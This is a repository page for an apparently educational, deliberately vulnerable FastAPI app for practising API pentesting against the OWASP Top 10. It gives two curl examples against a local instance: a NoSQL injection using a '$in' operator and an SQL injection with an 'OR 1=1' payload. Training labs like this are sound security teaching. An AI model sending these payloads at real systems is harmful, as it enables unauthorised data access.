GitHunt
NA

naryal2580/vfapi

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

fastapinosqlowasp-top-10owasp-top-10-2021owasp-top-tenowasp-top-ten-2021rest-apisqlvulnerablevulnerable-apivulnerable-applicationvulnerable-web-appwebapp

Vulnerable FastAPI Logo

Vulnerable FastAPI, compliant to OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.

Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq

Thanks

Languages

Python72.4%Shell9.3%HTML6.9%CSS6.7%Svelte3.3%JavaScript1.5%

Contributors

NA
MIT License
Created December 28, 2021
Updated December 10, 2025